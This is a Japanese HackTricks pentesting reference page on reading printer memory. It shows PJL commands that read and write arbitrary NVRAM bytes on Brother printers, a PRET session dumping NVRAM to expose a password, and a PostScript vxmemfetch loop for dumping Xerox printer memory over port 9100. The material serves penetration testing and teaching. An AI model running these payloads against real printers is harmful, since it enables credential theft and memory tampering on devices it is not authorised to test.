hacktricks/network-services-pentesting/pentesting-printers/memory-access.md
2023-07-07 23:42:27 +00:00

5.3 KiB
Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

NVRAMをダンプして、機密情報パスワードなどを抽出することができます。

PJLBrotherでは、以下のようにPJLを使用して任意のNVRAMアドレスにアクセスできます:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

この攻撃をテストするには、PRETを使用できます。

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

特定のXeroxプリンターモデルには、攻撃者が任意のメモリアドレスを読み取ることができる専用のPostScript vxmemfetchオペレーターが組み込まれています。PostScriptループを使用することで、次のようにして簡単にメモリ全体をダンプすることができますPRETにはこの攻撃はありませんので、このペイロードをポート9100にnc接続で送信する必要があります):

/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat

詳細はこちら: http://hacking-printers.net/wiki/index.php/Memory_access

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥